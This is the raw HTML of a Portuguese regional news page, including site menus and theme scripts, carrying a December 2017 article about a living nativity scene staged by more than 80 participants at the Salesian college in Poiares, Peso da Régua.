            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/comicio-festa-do-psd-vila-real/" rel="bookmark" title="COMÍCIO FESTA DO PSD-VILA REAL">COMÍCIO FESTA DO PSD-VILA REAL</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_17_5a35df40df670" data-td_block_id="td_uid_17_5a35df40df670"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_17_5a35df40df670" data-td_block_id="td_uid_17_5a35df40df670"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-217"><a href="http://www.noticiasdevilareal.com/category/desporto/">Desporto</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_18_5a35df40e4515_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_18_5a35df40e4515" ><script>var block_td_uid_18_5a35df40e4515 = new tdBlock();
block_td_uid_18_5a35df40e4515.id = "td_uid_18_5a35df40e4515";
block_td_uid_18_5a35df40e4515.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"12","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_18_5a35df40e4515_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_18_5a35df40e4515_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_18_5a35df40e4515.td_column_number = "3";
block_td_uid_18_5a35df40e4515.block_type = "td_block_mega_menu";
block_td_uid_18_5a35df40e4515.post_count = "4";
block_td_uid_18_5a35df40e4515.found_posts = "118";
block_td_uid_18_5a35df40e4515.header_color = "";
block_td_uid_18_5a35df40e4515.ajax_pagination_infinite_stop = "";
block_td_uid_18_5a35df40e4515.max_num_pages = "30";
tdBlocksArray.push(block_td_uid_18_5a35df40e4515);
</script>            <script>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</script>
            <div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_18_5a35df40e4515" id="td_uid_19_5a35df40e547d" data-td_block_id="td_uid_18_5a35df40e4515" data-td_filter_value="" href="http://www.noticiasdevilareal.com/category/desporto/">Todos</a><a class="mega-menu-sub-cat-td_uid_18_5a35df40e4515"  id="td_uid_20_5a35df40e556a" data-td_block_id="td_uid_18_5a35df40e4515" data-td_filter_value="46" href="http://www.noticiasdevilareal.com/category/desporto/corridas-de-vila-real/">Corridas de Vila Real</a></div></div><div id=td_uid_18_5a35df40e4515 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/sport-clube-de-vila-real-apresenta-plantel/" rel="bookmark" title="SPORT CLUBE DE VILA REAL APRESENTA PLANTEL"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/08/IMG_2444-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/08/IMG_2444-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/08/IMG_2444-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="SPORT CLUBE DE VILA REAL APRESENTA PLANTEL"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/desporto/" class="td-post-category">Desporto</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/sport-clube-de-vila-real-apresenta-plantel/" rel="bookmark" title="SPORT CLUBE DE VILA REAL APRESENTA PLANTEL">SPORT CLUBE DE VILA REAL APRESENTA PLANTEL</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/gp-lordelo-acelera-a-22-e-23-de-julho/" rel="bookmark" title="GP Lordelo acelera a 22 e 23 de julho"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/19601402_1444228918956198_8477062174598962487_n-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/19601402_1444228918956198_8477062174598962487_n-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/19601402_1444228918956198_8477062174598962487_n-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="GP Lordelo acelera a 22 e 23 de julho"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/desporto/" class="td-post-category">Desporto</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/gp-lordelo-acelera-a-22-e-23-de-julho/" rel="bookmark" title="GP Lordelo acelera a 22 e 23 de julho">GP Lordelo acelera a 22 e 23 de julho</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/circuito-de-vila-real-francisco-mora-e-francisco-abreu-em-destaque-no-tcr/" rel="bookmark" title="Circuito de Vila Real: Francisco Mora e Francisco Abreu em destaque no TCR"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/TCR-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/TCR-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/TCR-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Circuito de Vila Real: Francisco Mora e Francisco Abreu em destaque no TCR"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/desporto/corridas-de-vila-real/" class="td-post-category">Corridas de Vila Real</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/circuito-de-vila-real-francisco-mora-e-francisco-abreu-em-destaque-no-tcr/" rel="bookmark" title="Circuito de Vila Real: Francisco Mora e Francisco Abreu em destaque no TCR">Circuito de Vila Real: Francisco Mora e Francisco Abreu em destaque&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/circuito-de-vila-real-autarquia-esta-de-parabens/" rel="bookmark" title="Circuito de Vila Real: autarquia está de parabéns"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Festival_motos-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Festival_motos-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/07/Festival_motos-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Circuito de Vila Real: autarquia está de parabéns"/></a></div>                <a href="http://www.noticiasdevilareal.com/category/desporto/corridas-de-vila-real/" class="td-post-category">Corridas de Vila Real</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/circuito-de-vila-real-autarquia-esta-de-parabens/" rel="bookmark" title="Circuito de Vila Real: autarquia está de parabéns">Circuito de Vila Real: autarquia está de parabéns</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_18_5a35df40e4515" data-td_block_id="td_uid_18_5a35df40e4515"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_18_5a35df40e4515" data-td_block_id="td_uid_18_5a35df40e4515"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-811"><a href="http://www.noticiasdevilareal.com/category/video/">Vídeos</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_21_5a35df40ee9e1_rand td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_21_5a35df40ee9e1" ><script>var block_td_uid_21_5a35df40ee9e1 = new tdBlock();
block_td_uid_21_5a35df40ee9e1.id = "td_uid_21_5a35df40ee9e1";
block_td_uid_21_5a35df40ee9e1.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"37","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_21_5a35df40ee9e1_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_21_5a35df40ee9e1_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_21_5a35df40ee9e1.td_column_number = "3";
block_td_uid_21_5a35df40ee9e1.block_type = "td_block_mega_menu";
block_td_uid_21_5a35df40ee9e1.post_count = "5";
block_td_uid_21_5a35df40ee9e1.found_posts = "15";
block_td_uid_21_5a35df40ee9e1.header_color = "";
block_td_uid_21_5a35df40ee9e1.ajax_pagination_infinite_stop = "";
block_td_uid_21_5a35df40ee9e1.max_num_pages = "3";
tdBlocksArray.push(block_td_uid_21_5a35df40ee9e1);
</script><div id=td_uid_21_5a35df40ee9e1 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/poco-do-agueirinho-e-cascatas-do-rio-corgo-em-vila-real/" rel="bookmark" title="Poço do Agueirinho e cascatas do Rio Corgo em Vila Real"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/corgo-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/corgo-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/06/corgo-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Poço do Agueirinho e cascatas do Rio Corgo em Vila Real"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>                <a href="http://www.noticiasdevilareal.com/category/video/" class="td-post-category">Vídeo</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/poco-do-agueirinho-e-cascatas-do-rio-corgo-em-vila-real/" rel="bookmark" title="Poço do Agueirinho e cascatas do Rio Corgo em Vila Real">Poço do Agueirinho e cascatas do Rio Corgo em Vila Real</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/acidente-em-vila-real-nos-classicos-de-1300/" rel="bookmark" title="Acidente em Vila Real nos clássicos de 1300"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/maxresdefault-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/maxresdefault-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/maxresdefault-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Acidente em Vila Real nos clássicos de 1300"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>                <a href="http://www.noticiasdevilareal.com/category/video/" class="td-post-category">Vídeo</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/acidente-em-vila-real-nos-classicos-de-1300/" rel="bookmark" title="Acidente em Vila Real nos clássicos de 1300">Acidente em Vila Real nos clássicos de 1300</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/marchas-de-santo-antonio-de-vila-real-2016/" rel="bookmark" title="Marchas de Santo António de Vila Real 2016"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/sddefault-2-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/sddefault-2-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/06/sddefault-2-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Marchas de Santo António de Vila Real 2016"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>                <a href="http://www.noticiasdevilareal.com/category/video/" class="td-post-category">Vídeo</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/marchas-de-santo-antonio-de-vila-real-2016/" rel="bookmark" title="Marchas de Santo António de Vila Real 2016">Marchas de Santo António de Vila Real 2016</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/caminhada-nas-fisgas-de-ermelo-em-mondim-de-basto/" rel="bookmark" title="Caminhada nas Fisgas de Ermelo em Mondim de Basto"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/sddefault-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/sddefault-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/05/sddefault-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Caminhada nas Fisgas de Ermelo em Mondim de Basto"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>                <a href="http://www.noticiasdevilareal.com/category/video/" class="td-post-category">Vídeo</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/caminhada-nas-fisgas-de-ermelo-em-mondim-de-basto/" rel="bookmark" title="Caminhada nas Fisgas de Ermelo em Mondim de Basto">Caminhada nas Fisgas de Ermelo em Mondim de Basto</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.noticiasdevilareal.com/celebracoes-do-25-de-abril-em-vila-real/" rel="bookmark" title="Celebrações do 25 de Abril em Vila Real"><img width="218" height="150" class="entry-thumb" src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/maxresdefault-218x150.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/maxresdefault-218x150.jpg 218w, http://www.noticiasdevilareal.com/wp-content/uploads/2016/04/maxresdefault-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Celebrações do 25 de Abril em Vila Real"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div>                <a href="http://www.noticiasdevilareal.com/category/video/" class="td-post-category">Vídeo</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.noticiasdevilareal.com/celebracoes-do-25-de-abril-em-vila-real/" rel="bookmark" title="Celebrações do 25 de Abril em Vila Real">Celebrações do 25 de Abril em Vila Real</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_21_5a35df40ee9e1" data-td_block_id="td_uid_21_5a35df40ee9e1"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_21_5a35df40ee9e1" data-td_block_id="td_uid_21_5a35df40ee9e1"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-852"><a href="http://www.noticiasdevilareal.com/assine-ja/">Assine já!</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="http://www.noticiasdevilareal.com/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Pesquisa" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap td-container-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="http://www.noticiasdevilareal.com/">Inicio</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Ver todos Território" class="entry-crumb" href="http://www.noticiasdevilareal.com/category/territorio/">Território</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Ver todos Região" class="entry-crumb" href="http://www.noticiasdevilareal.com/category/territorio/regiao/">Região</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">“Presépio Vivo” recriado por mais de 80 figurantes em Poiares</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-6610" class="post-6610 post type-post status-publish format-standard has-post-thumbnail hentry category-regiao category-religiao" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://www.noticiasdevilareal.com/category/territorio/">Território</a></li><li class="entry-category"><a  href="http://www.noticiasdevilareal.com/category/territorio/regiao/">Região</a></li><li class="entry-category"><a  href="http://www.noticiasdevilareal.com/category/sociedade/">Sociedade</a></li><li class="entry-category"><a  href="http://www.noticiasdevilareal.com/category/sociedade/religiao/">Religião</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">“Presépio Vivo” recriado por mais de 80 figurantes em Poiares</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name"><div class="td-author-by">Por</div> <a href="http://www.noticiasdevilareal.com/author/nvr/">NVR</a><div class="td-author-line"> - </div> </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-12-14T15:54:24+00:00" >14 Dezembro, 2017</time></span>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-6610">400</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.noticiasdevilareal.com%2Fpresepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Partilhar no facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%E2%80%9CPres%C3%A9pio+Vivo%E2%80%9D+recriado+por+mais+de+80+figurantes+em+Poiares&url=http%3A%2F%2Fwww.noticiasdevilareal.com%2Fpresepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares%2F&via=Not%C3%ADcias+de+Vila+Real"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Partilhar no Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/&amp;media=http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg&description=%E2%80%9CPres%C3%A9pio+Vivo%E2%80%9D+recriado+por+mais+de+80+figurantes+em+Poiares" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=%E2%80%9CPres%C3%A9pio+Vivo%E2%80%9D+recriado+por+mais+de+80+figurantes+em+Poiares%20-%20http%3A%2F%2Fwww.noticiasdevilareal.com%2Fpresepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares%2F" ><i class="td-icon-whatsapp"></i></a>
	            </div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg" data-caption=""><img width="696" height="391" class="entry-thumb td-modal-image" src="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-696x391.jpg" srcset="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-696x391.jpg 696w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-300x168.jpg 300w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-768x431.jpg 768w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares-748x420.jpg 748w, http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg 960w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="Peso da Régua-“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"/></a></div>
        <p>No próximo domingo, poderá visitar o “Presépio Vivo”, recriado no Colégio Salesiano de Poiares, no Peso da Régua, com mais de 80 figurantes que dão vida a cenas bíblicas que antecedem o nascimento de Jesus e os ambientes típicos daquela época. No primeiro dia da iniciativa, os visitantes fizeram fila para fazer o percurso que representa uma viagem no tempo onde têm lugar de destaque o anjo que anuncia o nascimento do Menino Jesus, os três Reis Magos, José e Maria.</p>
<p>A preparação dos cenários, que se estendem ao longo dos corredores e do pavilhão do Colégio de Poiares, começou no início de novembro e obrigou, segundo um dos dinamizadores da iniciativa, Francisco Batista, “a muitas e muitas horas de trabalho”. “Temos aqui funcionários, professores e alunos do Colégio, mas também pessoas das aldeias vizinhas”, explicou.</p>
<p>Este ano, Sandrina Vieira, de 18 anos, é figurante na padaria, mas já esteve no mercado e já vestiu a pele de anjo. “Este ano está a ser mais interessante porque posso conviver com as pessoas que passam aqui”, conta a antiga aluna do Colégio, que continua a fazer questão de participar na iniciativa. Já Fábio Tavares, de 13 anos, é estreante. Já tinha visitado o Presépio Vivo em anos anteriores e agora decidiu participar como um dos reis magos. “É uma experiência nova e engraçada”, sublinhou.</p>
<p>Margarida Batista segurou um “Menino Jesus” adormecido que mal deu pela passagem dos visitantes. “Porta-se muito bem”, afirmou a figurante que deu vida a “Maria”. Participa desde o primeiro ano da iniciativa e enaltece a entreajuda entre os participantes. “Está tudo pronto a ajudar. Este ano temos mais personagens e mais cenários”, acrescentou.</p>
<p>O diretor do Colégio de Poiares, José Cordeiro, explicou que a iniciativa surgiu em 2010 pela mão do grupo de jovens “Fé e Obras”. “Já vamos na sétima edição. Vamos aumentando os quadros e criando cenas novas para podermos sempre algo novo para mostrar”, revelou José Cordeiro, que sublinhou que a iniciativa “une a comunidade escolar às pessoas” que vivem perto do estabelecimento de ensino.</p>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><h3>Deixe o seu Comentário</h3><p><fb:comments-count href=http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/></fb:comments-count> Comentário</p><div class="fb-comments" data-href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" data-numposts="10" data-width="100%" data-colorscheme="light"></div><div class="td-a-rec td-a-rec-id-content_bottom  "><div class="td-all-devices"><a href="http://www.noticiasdevilareal.com/livro-edicoes-nvr/"><img src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/08/Livros.jpg"/></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

                        <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Artigo anterior</span><a href="http://www.noticiasdevilareal.com/dgs-recomenda-vacina-contra-gripe-e-hidratacao-contra-o-frio/">DGS recomenda vacina contra gripe e hidratação contra o frio</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Próximo artigo</span><a href="http://www.noticiasdevilareal.com/utad-atribuiu-honoris-causa-ao-presidente-da-junta-da-galiza/">UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza</a></div></div></div>            <div class="author-box-wrap"><a href="http://www.noticiasdevilareal.com/author/nvr/"><img alt='' src='http://0.gravatar.com/avatar/f6d6b5d79b4f96c5e5eab5a522cd45d8?s=96&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/f6d6b5d79b4f96c5e5eab5a522cd45d8?s=192&amp;d=mm&amp;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://www.noticiasdevilareal.com/author/nvr/">NVR</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="NVR"></span><meta itemprop="datePublished" content="2017-12-14T15:54:24+00:00"><meta itemprop="dateModified" content="2017-12-15T15:56:10+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"></span><meta itemprop="name" content="Notícias de Vila Real"></span><meta itemprop="headline " content="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg"><meta itemprop="width" content="960"><meta itemprop="height" content="539"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts td_uid_23_5a35df4106118_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_23_5a35df4106118" ><script>var block_td_uid_23_5a35df4106118 = new tdBlock();
block_td_uid_23_5a35df4106118.id = "td_uid_23_5a35df4106118";
